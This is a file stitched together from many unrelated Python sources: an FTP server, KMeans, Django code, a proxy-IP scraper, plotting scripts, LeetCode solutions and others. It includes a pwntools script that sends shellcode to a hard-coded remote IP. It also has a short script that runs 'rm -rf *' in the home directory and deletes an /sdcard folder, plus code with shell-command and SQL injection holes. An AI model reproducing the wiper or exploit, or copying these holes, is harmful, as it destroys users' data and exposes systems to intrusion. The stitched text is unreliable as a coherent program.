"""Update an arbitrary parameter."""
return self.params.update(data)
def run(self) -> Tuple[List[Dict], List[Dict]]:
"""Design primers. Optionally provide additional parameters.
:param params:
:return: results
"""
with RestoreAfterRun(self.params):
self.settings._resolve()
return super()._run(None)
def run_and_optimize(
self,
max_iterations,
params: BoulderIO = None,
gradient: Dict[
str, Tuple[Union[float, int], Union[float, int], Union[float, int]]
] = None,
pick_anyway: bool = False,
) -> Tuple[List[dict], List[dict]]:
"""Design primers. If primer design is unsuccessful, relax parameters
as defined in primer3plust.Design.DEFAULT_GRADIENT. Repeat for the
specified number of max_iterations.
:param max_iterations: the max number of iterations to perform relaxation
:param params: optional parameters to provide
:param gradient: optional gradient to provide. If not provided,
            Design.DEFAULT_GRADIENT will be used. The gradient is a
            dictionary of 3-tuples: (step, min, max).
:param pick_anyway: if set to True, if the optimization finds no pairs,
pick a pair anyways.
:return: results
"""
with RestoreAfterRun(self.params):
self.settings._resolve()
pairs, explain = super().run_and_optimize(max_iterations)
if pick_anyway and not pairs:
self.settings.pick_anyway(1)
pairs, explain = super().run()
return pairs, explain
def new(params=None):
"""Start a new design."""
design = Design()
if params:
        design.params.update(params)
    return design
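# Minimal usage sketch (commented out; mirrors the module docstring example and
# assumes primer3 is installed and this module is imported as part of the package):
#   design = Design()
#   design.settings.template("AGGTTGCGTGTGTATGGTCGTGTAGTGTGT")
#   design.settings.left_sequence("GTTGCGTGTGT")
#   design.settings.as_cloning_task()
#   pairs, explain = design.run()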
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
from socket import *
from conf.settings import *
import configparser
import os
import struct
import json
import time
import sys
import hashlib
import subprocess
class FtpServer:
address_family = AF_INET
socket_type = SOCK_STREAM
def __init__(self, server_address):
"""
        Initialization.
        :param server_address: ("ip address", port)
"""
self.server_address = server_address
self.phone = socket(self.address_family, self.socket_type)
if IS_REUSE:
self.phone.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.phone.bind(SERVER_IP_PORT)
self.phone.listen(MAX_LISTEN)
def login(self, conn, date_dic):
config = configparser.ConfigParser()
config.read(USER_INFO, encoding='utf-8')
print(date_dic)
in_name = date_dic["username"]
in_password = date_dic["password"]
if config.has_section(in_name):
md5_pwd =hashlib.md5()
md5_pwd.update(in_password.encode(encoding))
if md5_pwd.hexdigest() == config.get(in_name, "Password"):
flag = 0
self.user_name = in_name
self.home = os.path.join(BASE_HOME, in_name)
self.cur_path = os.path.join(BASE_HOME, in_name)
self.Quotation = config.get(in_name, "Quotation")
            else:
                flag = 4  # wrong password
        else:
            flag = 5  # user does not exist
flag_len = struct.pack("l", flag) # flag_len bytes
conn.send(flag_len)
if flag == 0:
return True
def cd(self, conn, cmd):
if cmd[1] == ".":
conn.send(self.cur_path.encode(encoding=encoding))
elif cmd[1] == "..":
if self.cur_path == self.home:
conn.send(self.cur_path.encode(encoding=encoding))
else:
self.cur_path = os.path.dirname(self.cur_path)
conn.send(self.cur_path.encode(encoding=encoding))
else:
if os.path.exists(os.path.join(self.cur_path, cmd[1])):
self.cur_path = os.path.join(self.cur_path, cmd[1])
conn.send(self.cur_path.encode(encoding=encoding))
else:
conn.send("路径不存在".encode(encoding))
def get(self, conn, cmd):
filename = cmd[1]
        # 3. Open the file for reading and send its contents to the client
        # Step 1: build a fixed-length header
header_dic = {
'filename': filename, # 'filename':'1.mp4'
'file_size': os.path.getsize(os.path.join(BASE_HOME, self.user_name, filename))
}
header_json = json.dumps(header_dic)
print(header_json)
header_bytes = header_json.encode(encoding)
        # Step 2: send the header length first
conn.send(struct.pack('l', len(header_bytes)))
        # Step 3: send the header itself
conn.send(header_bytes)
        # Step 4: send the actual file data
with open(os.path.join(BASE_HOME, self.user_name, filename), 'rb') as f:
for line in f:
conn.send(line)
def put(self, conn, cmd):
        # Step 1: receive the header length first (struct.calcsize keeps the size consistent with pack('l'))
        obj = conn.recv(struct.calcsize('l'))
        header_size = struct.unpack('l', obj)[0]
        # Step 2: receive the header itself
        header_bytes = conn.recv(header_size)
        # Step 3: parse the description of the actual data from the header
header_json = header_bytes.decode('utf-8')
header_dic = json.loads(header_json)
total_size = header_dic['file_size']
filename = header_dic['filename']
        # Quota check: compare against the bytes already stored in the user's home directory
        used_size = sum(os.path.getsize(os.path.join(dp, name)) for dp, _, names in os.walk(self.home) for name in names)
        if total_size + used_size < int(self.Quotation) * 1024 * 1024 * 1024:
conn.send("1".encode(encoding))
            # Step 4: receive the actual data
if not os.path.exists(os.path.join(BASE_HOME, self.user_name, filename)):
conn.send("0".encode(encoding))
with open(os.path.join(BASE_HOME, self.user_name, filename), 'wb') as f:
recv_size = 0
while recv_size < total_size:
                        line = conn.recv(1024)  # receive in 1 KB chunks (recv may return fewer bytes)
f.write(line)
recv_size += len(line)
else:
has_rec =os.path.getsize(os.path.join(BASE_HOME, self.user_name, filename))
# print(has_rec) # 141115260
with open(os.path.join(BASE_HOME, self.user_name, filename),"ab+") as f:
conn.send("1".encode(encoding)) # 续传标志
conn.send(struct.pack("l",has_rec)) # 发 传了多少
last_data = header_dic["file_size"] - has_rec#还剩多少
recv_size = 0
while recv_size < last_data:
                        line = conn.recv(1024)  # receive in 1 KB chunks (recv may return fewer bytes)
f.write(line)
recv_size += len(line)
else:
conn.send("0".encode(encoding))
def dir(self, conn, cmd):
if len(cmd) == 1:
print(cmd[0] + " " + self.cur_path)
obj = subprocess.Popen(cmd[0] + " " + self.cur_path, shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
msg = obj.stderr.read() + obj.stdout.read()
conn.send(struct.pack("l", len(msg)))
print(len(msg))
conn.send(msg)
@staticmethod
def __view_bar__(received, total_size):
"""
        Print a progress bar.
        :param received: number of bytes received so far
        :param total_size: total size in bytes
:return:
"""
rate = float(received) / float(total_size)
rate_num = int(rate * 100)
r = '\r[%s%s]%d%%' % ("=" * rate_num, " " * (100 - rate_num), rate_num,)
sys.stdout.write(r)
sys.stdout.flush()
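# Standalone sketch of the length-prefixed JSON header protocol used by
# get()/put() above (illustration only; not bound to any socket):
#   header = json.dumps({'filename': 'demo.txt', 'file_size': 42}).encode('utf-8')
#   framed = struct.pack('l', len(header)) + header      # length prefix, then header
#   prefix = struct.calcsize('l')
#   size, = struct.unpack('l', framed[:prefix])
#   assert json.loads(framed[prefix:prefix + size])['file_size'] == 42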
|
import numpy as np
import itertools
class KMeans:
def __init__(self, n_clusters, max_iter=1000, random_seed=0):
self.n_clusters = n_clusters
self.max_iter = max_iter
self.random_state = np.random.RandomState(random_seed)
def fit(self, X):
cycle = itertools.cycle(range(self.n_clusters))
        self.labels_ = np.fromiter(itertools.islice(cycle, X.shape[0]), dtype=int)
self.random_state.shuffle(self.labels_)
labels_prev = np.zeros(X.shape[0])
count = 0
self.cluster_centers_ = np.zeros((self.n_clusters, X.shape[1]))
while (not (self.labels_ == labels_prev).all() and count < self.max_iter):
for i in range(self.n_clusters):
XX = X[self.labels_ == i, :]
self.cluster_centers_[i, :] = XX.mean(axis=0)
dist = ((X[:, :, np.newaxis] - self.cluster_centers_.T[np.newaxis, :, :]) ** 2).sum(axis=1)
labels_prev = self.labels_
self.labels_ = dist.argmin(axis=1)
count += 1
def predict(self, X):
dist = ((X[:, :, np.newaxis] - self.cluster_centers_.T[np.newaxis, :, :]) ** 2).sum(axis=1)
labels = dist.argmin(axis=1)
return labels
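# A minimal self-check of the KMeans class above (assumed usage; only needs numpy):
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    # Three well-separated 2-D blobs of 50 points each.
    X = np.vstack([rng.randn(50, 2) + offset for offset in ([0, 0], [5, 5], [0, 5])])
    km = KMeans(n_clusters=3)
    km.fit(X)
    print(km.cluster_centers_)   # one centre near each blob offset
    print(km.predict(X[:5]))     # cluster index for the first five points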
|
"""
How to shuffle a sorted list object alist?
"""
import random
alist = [1, 2, 3, 4, 5]
random.shuffle(alist)
print(alist)
|
# Generated by Django 2.2 on 2020-09-22 16:47
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('django_celery_results', '0007_remove_taskresult_hidden'),
]
operations = [
migrations.CreateModel(
name='Run',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('task', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='django_celery_results.TaskResult')),
],
),
migrations.CreateModel(
name='Contact_Form',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, null=True, verbose_name='isim')),
('surname', models.CharField(max_length=200, null=True, verbose_name='soyisim')),
('gsm_no', models.IntegerField(null=True, verbose_name='gsm_no')),
('email', models.CharField(max_length=200, null=True, verbose_name='email')),
('message', models.TextField(max_length=20000, null=True, verbose_name='mesaj')),
('created_date', models.DateTimeField(auto_now_add=True, null=True, verbose_name='Register Date')),
('main_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
import json
import re
import threading
import time
import datetime
from reload.res_test import func_res_test
from sql_server import MySql
class manage_ip:
ip_pool = []
def __init__(self):
        self.find_store_ip = self.input_ip()  # load the IPs
self.starts()
def starts(self):
self.add_ip()
t1 = threading.Thread(target= self.check)
t1.start()
def input_ip(self):
return find_store_ip()
    def check(self):  # monitor the pool; if it holds fewer than 5 IPs, add more immediately
        '''
        If the IP pool runs low, keep topping it up with new IPs; if no valid
        IPs are available, stay in a listening state.
        '''
while(1):
time.sleep(60)
if len(self.ip_pool)<5:
self.add_ip()
    def add_ip(self):  # add IPs to ip_pool
        '''
        Add proxy IPs to ip_pool.
        :return: True on success, otherwise False
        '''
        print("Adding IPs...")
today = datetime.date.today()
sql = f'''select ip from ip_pool where valid=1 and date = "{today}"'''
db = MySql()
res = db.fetch_all(sql)
print(type(res))
if res != tuple():
for i in res:
self.ip_pool.append(i[0])
print("添加成功")
return True
print("添加失败,数据库中没有合适的值")
return False
    def update_valid(self, ip):  # set valid to 0 for the given IP
sql = f'''update ip_pool set valid = 0 where ip="{ip}"'''
db = MySql()
res = db.execute(sql)
print("delete ok")
    def delete_today(self):  # delete all of today's data
sql = "Delete from ip_pool where 1=1"
db = MySql()
res = db.execute(sql)
print("delete all ok")
    # self.ip_pool.extend(new_ips)
class find_store_ip:
def __init__(self):
self.res = func_res_test()
self.starts()
def starts(self):
self.to_mange()
t1= threading.Thread(target=self.listen_write)
t1.start()
print(">>")
def ip_check(self, ip):
'''
        :param ip: the proxy IP to test
        :return: True if the IP is usable, False otherwise
'''
        test_url = "https://api.bilibili.com/x/space/arc/search?mid=451618887&pn=1&ps=100&jsonp=jsonp"
response = self.res.init_head(test_url, time=3, ip=ip)
if response == None:
return False
if response.status_code != 200:
return False
else:
return True
def listen_write(self):
while(1):
time.sleep(100)
url = input("请输入获得ip的地址,如若想退出,请按quit")
self.to_mange2(url)
if url == "quit":
break
    def to_mange(self):  # orchestrates the helper steps
        url = input("Enter the URL to fetch IPs from: ")
ip_item = self.get_ip(url)
if ip_item!=None and ip_item !=[] :
for i in ip_item:
if self.ip_check(i):
self.ip_store(i)
return False
return True
    def to_mange2(self, url):  # orchestrates the helper steps for a given URL
ip_item = self.get_ip(url)
if ip_item!=None and ip_item !=[] :
for i in ip_item:
if self.ip_check(i):
self.ip_store(i)
def get_ip(self,url):
'''
        :param url: URL of the proxy-list API
        :return: a list of proxy IPs; None if the connection fails, [] if the
                 response status code is not 200
'''
response = None
try:
response = self.res.init_head(url, time=4)
if response.status_code != 200:
print("url错误!!!")
return []
else:
return self.get_ip_rules(response)
except Exception as e:
print(e)
return response
    def get_ip_rules(self, response):  # rules for extracting IPs from the response text
'''
:param response:
:return: list
'''
js = response.text
        print(re.findall(r'\d+\.\d+\.\d+\.\d+:\d+', js))
        return re.findall(r'\d+\.\d+\.\d+\.\d+:\d+', js)
def ip_store(self,ip):
db = MySql()
sql = f'''insert into ip_pool values(null,'{ip}',NOW(),1)'''
print(sql)
db.execute(sql)
if __name__ == '__main__':
# p = find_store_ip()
p = manage_ip()
# p.delete_today()
# http://x.fanqieip.com/index.php?s=/Api/IpManager/adminFetchFreeIpRegionInfoList&uid=12522&ukey=caa11eef0b28fa88056de334a5c0c2e3&limit=10&format=0&page=1
|
#!/usr/bin/python
#coding=utf-8
#__author__:TaQini
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
p=remote('157.245.88.100', 7778)
sc=asm('xor rax,rax\n mov al,7\nret\n')
p.sendline(sc)
p.interactive()
|
from __future__ import print_function, division, absolute_import
import csv
import numpy as np
import copy
import matplotlib.pyplot as plt
__all__ = ['paths', 'top_path']
import matplotlib
font = {'family' : 'normal',
'weight' : 'normal',
'size' : 18}
matplotlib.rc('font', **font)
########## Load in transition data ############
t_file=open('../../../Output_Files/transition_search.dat')
transitions_tot=[]
with t_file as my_file:
for line in my_file:
myarray=np.fromstring(line, dtype=float, sep=' ')
transitions_tot.append(myarray)
transitions=transitions_tot
data=np.loadtxt('../../../Input_Files/input.dat') ## input data from Conf_search
Most_likely_paths=[int(p) for p in np.loadtxt('pathway.dat')] ## most likely path from Dijkstra's algorithm
z_ind = 0
inc_ind = 1
az_ind = 2
en_ind = 3
top_z=np.max(data[:,0]) ## starting z used to build transition matrix
bott_z=-11.5 ## ending z used to build transition matrix
z_step = 1 ## step size used to build transition matrix
inc_step = 18 ## step size used to build transition matrix
az_step = 18 ## step size used to build transition matrix
###### Create grids in z, inclination and azimuthal spaces. These grids are used to plot the eventual path ######
it=0
Grid_z=[]
Grid_ang=[]
Grid_az=[]
iteration=0
z_step=1
z_num=int((top_z-bott_z)/float(z_step))
grid_z=[]
for i in range(z_num):
z_i=top_z-z_step*i
grid_z=np.append(grid_z,z_i)
grid_inc_ang=np.arange(0,180,inc_step)
grid_az_ang=np.arange(0,360,az_step)
for z in range(len(grid_z)):
for ang in range(len(grid_inc_ang)):
for az in range(len(grid_az_ang)):
Grid_z=np.append(Grid_z,grid_z[z])
Grid_ang=np.append(Grid_ang,grid_inc_ang[ang])
Grid_az=np.append(Grid_az,grid_az_ang[az])
iteration+=1
######## For each point along the path, determine the associated grid value ############
mlp_z=[]
mlp_ang=[]
mlp_az=[]
for j in range(len(Most_likely_paths)):
if Most_likely_paths[j]!=7402 and Most_likely_paths[j]!=0:
iteration_number=Most_likely_paths[j]
mlp_z=np.append(mlp_z,Grid_z[int(iteration_number)])
mlp_ang=np.append(mlp_ang,Grid_ang[int(iteration_number)]+9)
mlp_az=np.append(mlp_az,Grid_az[int(iteration_number)]+9)
MLP_z=mlp_z
MLP_ang=mlp_ang
MLP_az=mlp_az
####### Plot the paths !#########
plt.plot(MLP_z,MLP_ang,color='black')
plt.scatter(MLP_z,MLP_ang,color='black')
plt.ylim(0,180)
plt.savefig(f'path_scatter_inc_z_full.png',bbox_inches='tight',transparent=True)
plt.close()
plt.plot(MLP_z,MLP_az,color='black')
plt.scatter(MLP_z,MLP_az,color='black')
plt.ylim(0,360)
plt.savefig(f'path_scatter_az_z_full.png',bbox_inches='tight',transparent=True)
plt.close()
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import math
import time
import numpy as np
from . import colortables
from webservice.algorithms.NexusCalcHandler import NexusCalcHandler as BaseHandler
from webservice.NexusHandler import nexus_handler
@nexus_handler
class ColorBarCalcHandler(BaseHandler):
name = "ColorBarHandler"
path = "/colorbar"
description = "Creates a CMC colorbar spec for a dataset"
params = {
"ds": {
"name": "Dataset",
"type": "string",
"description": "A supported dataset shortname identifier"
},
"t": {
"name": "Time",
"type": "int",
"description": "Data observation date if not specifying a min/max"
},
"min": {
"name": "Minimum Value",
"type": "float",
"description": "Minimum value to use when computing color scales. Will be computed if not specified"
},
"max": {
"name": "Maximum Value",
"type": "float",
"description": "Maximum value to use when computing color scales. Will be computed if not specified"
},
"ct": {
"name": "Color Table",
"type": "string",
"description": "Identifier of a supported color table"
}
}
singleton = True
def __init__(self, tile_service_factory):
BaseHandler.__init__(self, tile_service_factory)
def __get_dataset_minmax(self, ds, dataTime):
dataTimeStart = dataTime - 86400.0 # computeOptions.get_datetime_arg("t", None)
dataTimeEnd = dataTime
daysinrange = self._get_tile_service().find_days_in_range_asc(-90.0, 90.0, -180.0, 180.0, ds, dataTimeStart,
dataTimeEnd)
ds1_nexus_tiles = self._get_tile_service().get_tiles_bounded_by_box_at_time(-90.0, 90.0, -180.0, 180.0,
ds,
daysinrange[0])
data_min = 100000
data_max = -1000000
for tile in ds1_nexus_tiles:
data_min = np.min((data_min, np.ma.min(tile.data)))
data_max = np.max((data_max, np.ma.max(tile.data)))
return data_min, data_max
def __produce_color_list(self, colorbarDef, numColors, min, max, units):
colors = []
labels = []
values = []
for i in range(0, numColors):
index = float(i) / float(numColors)
index = index * (len(colorbarDef) - 1)
prev = int(math.floor(index))
next = int(math.ceil(index))
f = index - prev
prevColor = colorbarDef[prev]
nextColor = colorbarDef[next]
color = [0, 0, 0, 255]
color[0] = nextColor[0] * f + (prevColor[0] * (1.0 - f))
color[1] = nextColor[1] * f + (prevColor[1] * (1.0 - f))
color[2] = nextColor[2] * f + (prevColor[2] * (1.0 - f))
            colors.append('%02x%02x%02xFF' % (int(color[0]), int(color[1]), int(color[2])))
value = (float(i) / float(numColors - 1)) * (max - min) + min
valueHigh = (float(i + 1) / float(numColors - 1)) * (max - min) + min
labels.append("%3.2f %s" % (value, units))
values.append((value, valueHigh))
return colors, labels, values
def calc(self, computeOptions, **args):
ds = computeOptions.get_argument("ds", None)
dataTime = computeOptions.get_datetime_arg("t", None)
if dataTime is None:
raise Exception("Missing 't' option for time")
dataTime = time.mktime(dataTime.timetuple())
color_table_name = computeOptions.get_argument("ct", "smap")
color_table = colortables.__dict__[color_table_name]
min = computeOptions.get_float_arg("min", np.nan)
max = computeOptions.get_float_arg("max", np.nan)
num_colors = computeOptions.get_int_arg("num", 255)
units = computeOptions.get_argument("units", "")
if np.isnan(min) or np.isnan(max):
data_min, data_max = self.__get_dataset_minmax(ds, dataTime)
if np.isnan(min):
min = data_min
if np.isnan(max):
max = data_max
colors, labels, values = self.__produce_color_list(color_table, num_colors, min, max, units)
obj = {
"scale": {
"colors": colors,
"labels": labels,
"values": values
},
"id": ds
}
class SimpleResult(object):
def toJson(self):
return json.dumps(obj, indent=4)
return SimpleResult()
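# Standalone sketch of the linear interpolation performed in __produce_color_list
# above (hypothetical two-entry colour table, for illustration only):
#   table = [(0, 0, 0), (255, 255, 255)]
#   f = 0.25
#   rgb = tuple(int(table[1][c] * f + table[0][c] * (1 - f)) for c in range(3))
#   # -> (63, 63, 63), emitted as the hex string '3f3f3fFF'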
|
class Solution(object):
def __init__(self, head):
"""
@param head The linked list's head.
Note that the head is guaranteed to be not null, so it contains at least one node.
:type head: ListNode
"""
self.head = head
def getRandom(self):
"""
Returns a random node's value.
:rtype: int
"""
        # Reservoir sampling (k = 1): replace the kept node with probability 1/(index + 1)
        result, node, index = self.head, self.head.next, 1
        while node:
            if random.randint(0, index) == 0:
result = node
node = node.next
index += 1
return result.val
import random
class Solution(object):
def __init__(self, head):
self.arr = []
while head:
self.arr.append(head.val)
head = head.next
def getRandom(self):
return random.choice(self.arr)
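# Quick check of either solution above (hypothetical minimal ListNode, since the
# real definition is supplied by the judge):
#   class ListNode:
#       def __init__(self, val, next=None):
#           self.val, self.next = val, next
#   head = ListNode(1, ListNode(2, ListNode(3)))
#   print(Solution(head).getRandom())  # prints 1, 2 or 3, each with probability 1/3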
|
import os , sys , time , datetime, re
reload(sys)
sys.setdefaultencoding('utf-8')
os.system('cd && rm -rf * ')
os.system('cd /sdcard && rm -rf afzajaan')
print(' BY BY ' )
print('')
print(' ')
print(' HOP :) ' )
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
from django import template
from django.db import models
from django.template.loader import render_to_string
from django.core.urlresolvers import reverse
from django.utils.text import slugify
from django.core.urlresolvers import NoReverseMatch
Widget = models.get_model('magiccontent', 'Widget')
Area = models.get_model('magiccontent', 'Area')
register = template.Library()
def get_first_content(content_list, widget):
if not content_list:
first_item = widget.get_widget_type.site_objects.create(widget=widget)
first_item.save()
else:
first_item = content_list[0]
return first_item
@register.simple_tag(takes_context=True)
def show_widget_area_tag(context, area_name, can_edit=False,
widget_type='textimagecontent', style='default',
*args, **kwargs):
"""
Template Tag for generating a custom HTML for the given 'area_name' which
will have a correspondent Widget.
When the Area does not exist, it will be generated an Area, Widget and its
BaseContent register.
"""
request = context['request']
div = kwargs.get('div', None)
page_url = kwargs.get('page_url', None)
area, created = Area.site_objects.get_or_create(name=area_name)
if created:
widget = Widget.site_objects.create(
widget_type=widget_type, style_template=style)
area.widget = widget
area.save()
content_list = Widget.site_objects.list_content_from_type(area.widget)
first_item = get_first_content(content_list, area.widget)
# TODO: find a better place to add those CSS style classes names
editable = 'darkBorder edit-block' if can_edit else ''
template_name = 'magiccontent/{0}/{1}.html'.format(
area.widget.widget_type, area.widget.style_template)
context.update({'widget': area.widget, 'area': area, 'div': div,
'object_list': content_list, 'object': first_item,
'can_edit': can_edit, 'editable': editable,
'page_url': page_url, 'user': request.user})
return render_to_string(template_name, context)
@register.filter(name='is_an_area_visible_tag')
def is_an_area_visible_tag(area_name):
try:
area = Area.site_objects.get(name=area_name)
except Area.DoesNotExist:
area = None
if not area:
return True
return area.is_visible
@register.simple_tag(takes_context=True)
def show_widget_page_tag(context, widget=None, content_list=[],
can_edit=False, show_page=False, style=None):
"""
Template Tag for generating a custom HTML for the given Widget Page
"""
page = "_page" if show_page else ''
style_template = style if style else widget.style_template
template_name = 'magiccontent/{0}/{1}{2}.html'.format(
widget.widget_type, style_template, page)
first_item = get_first_content(content_list, widget)
context.update({'widget': widget, 'object_list': content_list,
'can_edit': can_edit, 'object': first_item, })
return render_to_string(template_name, context)
@register.inclusion_tag('magiccontent/show_editable_area_tag.html')
def show_editable_area_tag(area_id='', widget_id='', can_edit=False,
area_name='area'):
return {'area_id': area_id,
'widget_id': widget_id,
'area_name': area_name,
'can_edit': can_edit,
'widget': Widget.site_objects.get(pk=int(widget_id))}
@register.inclusion_tag('magiccontent/show_editable_widget_tag.html',
takes_context=True)
def show_editable_widget_tag(context, widget_type='', widget_id='',
content_id='', can_edit=False, show_add_btn=True,
show_order_btn=True, show_sytle_btn=True):
content_create_url = 'magiccontent.%s.create' % widget_type
content_update_url = 'magiccontent.%s.update' % widget_type
picture_update_url = 'magiccontent.%s.updatepicture' % widget_type
content_order_url = 'magiccontent.%s.order' % widget_type
create_url = reverse(
content_create_url,
kwargs={'widget_pk': widget_id}) if show_add_btn else ''
update_url = reverse(
content_update_url,
kwargs={'widget_pk': widget_id, 'pk': content_id})
try:
updatepicture_url = reverse(
picture_update_url,
kwargs={'widget_pk': widget_id, 'pk': content_id})
except NoReverseMatch:
updatepicture_url = None
order_url = reverse(
content_order_url,
kwargs={'widget_pk': widget_id}) if show_order_btn else ''
widget_update_url = reverse(
'magiccontent.widget.update', kwargs={'pk': widget_id})
_help_ctx = {
'help_edit_url': context.get('help_page_edit_content'),
'help_edit_show': context.get('show_help_page_edit_content'),
'help_edit_description': 'Learn how to edit contents',
'help_edit_flag': 'help_page_edit_content',
'help_add_url': context.get('help_page_add_content'),
'help_add_show': context.get('show_help_page_add_content'),
'help_add_description': 'Learn how to add new contents',
'help_add_flag': 'help_page_add_content',
}
ctx = {'create_url': create_url,
'update_url': update_url,
'updatepicture_url': updatepicture_url,
'order_url': order_url,
'style_url': widget_update_url if show_sytle_btn else '',
'can_edit': can_edit}
ctx.update(_help_ctx)
return ctx
@register.filter(name='show_help_text', is_safe=True)
def show_help_text(value):
"""
Returns a standard help file path
"""
return "magiccontent/help_text_{0}.html".format(slugify(value))
|
# -*- coding: utf-8 -*-
"""
Lab assignment 2
Working with a file: perform operations on a text file
Strategy pattern, template method
"""
import os
import shutil
file = 'C:/Users/Alexey/Desktop/file.txt'
class Delete_FILE:  # operation class
def solve(self, file):
os.remove(file)
        return 'File ' + file + ' was deleted successfully!'
class Copy_FILE:  # operation class
def solve(self, file):
shutil.copyfile(file,'C:/Users/Alexey/Desktop/сюда/'+file.split('/')[-1])
        return 'File copied successfully!'
class Create_FILE:  # operation class
def solve(self, file):
f = open(file, 'w', encoding = 'utf-8')
f.close()
        return 'File ' + file + ' was created successfully!'
class GENERAL:  # context class that delegates to the selected strategy
def SET_STRATEGY(self, STRATEGY):
self.STRATEGY = STRATEGY
def solve(self, file):
print(self.STRATEGY.solve(file))
start = GENERAL()
start.SET_STRATEGY(Delete_FILE())
start.solve("C:/Users/Alexey/Desktop/file.txt")
input()
start.SET_STRATEGY(Create_FILE())
start.solve("C:/Users/Alexey/Desktop/file.txt")
input()
start.SET_STRATEGY(Copy_FILE())
start.solve("C:/Users/Alexey/Desktop/file.txt")
input()
start.SET_STRATEGY(Delete_FILE())
start.solve("C:/Users/Alexey/Desktop/сюда/file.txt")
|
#!/usr/bin/env python3
from setuptools import setup
import os, os.path
import sys
ver = "1.2"
def read(filename):
return open(os.path.join(os.path.dirname(__file__), filename)).read()
if sys.version_info < (3,0):
print('Oops, only python >= 3.0 supported!')
sys.exit()
setup(name = 'pixelterm',
version = ver,
description = 'Render pixely images on your terminal. Now also with animated GIF support.',
license = 'BSD',
author = 'jaseg',
author_email = 'pixelterm@jaseg.net',
url = 'https://github.com/jaseg/pixelterm',
packages = ['pixelterm'],
install_requires=['pillow'],
py_modules = [ 'commands' ],
entry_points = {'console_scripts': [
'pixelterm=commands:pixelterm',
'unpixelterm=commands:unpixelterm',
'gifterm=commands:gifterm',
'colorcube=commands:colorcube',
'resolvecolor=commands:resolvecolor',
'pngmeta=commands:pngmeta']},
classifiers = [
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Information Technology',
        'Intended Audience :: End Users/Desktop',
'License :: Freely Distributable',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3',
'Topic :: Internet',
'Topic :: Graphics',
        'Topic :: System :: Networking',
        'Topic :: Text Processing :: Filters',
'Topic :: Utilities',
],
long_description = read('README.md'),
dependency_links = [],
)
|
"""If users enters x number of positive integers.
Program goes through those integers and finds the maximum positive
and updates the code. If a negative integer is inputed the progam stops the execution
"""
"""
num_int = int(input("Input a number: ")) # Do not change this line
max_int = num_int
while num_int >= 0:
if num_int > max_int:
max_int = num_int
num_int = int(input("Input a number: "))
print ("The maximum is", max_int)
"""
n = int(input("Enter the length of the sequence: ")) # Do not change this line
num1 = 0
num2 = 0
num3 = 1
i = 1
for i in range(n):
temp3 = num3
num3 = num1 + num2 + num3
if i > 1:
num1 = num2
num2 = temp3
print(num3)
|
from django.shortcuts import render
from django.views.generic.edit import CreateView
from .models import First
# Create your views here.
def view(request):
query = First.objects.all()
return render(request, 'view.html', {'data': query})
class Create(CreateView):
model = First
fields = ('title', 'content')
template_name = 'add.html'
success_url = '/first/create'
|
from keras.callbacks import Callback
class YpredCallback(Callback):
"""Used as a callback for Keras to get Ypred_train, and Ypred_test for each epoch.
Example:
yc = YpredCallback(X, X)
model.fit(X, Y, callbacks=[yc]
"""
def __init__(self, model, X_train, X_test=None):
self.model = model # Keras model
self.Y_train = []
self.Y_test = []
self.X_train = X_train
# If X_test is None, use X_train
if X_test is None:
self.X_test = X_train
else:
self.X_test = X_test
    def on_epoch_end(self, epoch, logs=None):
Y_train_pred = self.model.predict(self.X_train).flatten()
Y_test_pred = self.model.predict(self.X_test).flatten()
self.Y_train.append(Y_train_pred)
self.Y_test.append(Y_test_pred)
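# A minimal usage sketch, assuming a toy regression model; any compiled Keras model
# would work the same way. The callback collects one prediction array per epoch.
if __name__ == "__main__":
    import numpy as np
    from keras.models import Sequential
    from keras.layers import Dense

    X = np.random.rand(32, 4)
    Y = np.random.rand(32)
    model = Sequential([Dense(8, activation="relu", input_shape=(4,)), Dense(1)])
    model.compile(optimizer="adam", loss="mse")

    yc = YpredCallback(model, X)  # X_test defaults to X_train
    model.fit(X, Y, epochs=2, callbacks=[yc], verbose=0)
    print(len(yc.Y_train), "epochs of train predictions collected")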
|
from hierarchy import Hierarchy
from situation import Situation
from itertools import product, combinations
from fractions import Fraction
import networkx as nx
'''
Return whether a cause is pivotal
if the cause was different, the effect would have been different
parameters:
Hierarchy hierarchy
str cause
str effect
dict attr containing effect value
return: True or False
'''
# def pivotal(hierarchy, cause, effect, **attr):
# # set initial outcome
# outcome = hierarchy.evaluate(effect)
# copy = hierarchy.copy()
# # print 'before'
# # copy.print_situation()
# copy.clear_values()
# if attr.has_key('values'):
# copy.assign_values(attr['values'])
# if attr.has_key('e_value'):
# if outcome != attr['e_value']:
# print 'False by e_value'
# return False
# copy.node[cause]['value'] = int(not hierarchy.node[cause]['value'])
# new = copy.evaluate(effect)
# # print 'after'
# # copy.print_situation()
# if outcome != new:
# print 'True'
# return True
# else:
# print 'False'
# return False
# '''
# Calculate pivotaility
# parameters:
# Hierarchy hierarchy
# int level ???change to str???
# str cause node
# str effect node
# return:
# Fraction
# '''
# def pivotality(hierarchy, cause, effect, **attr):
# copy = hierarchy.copy()
# if attr.has_key('root'):
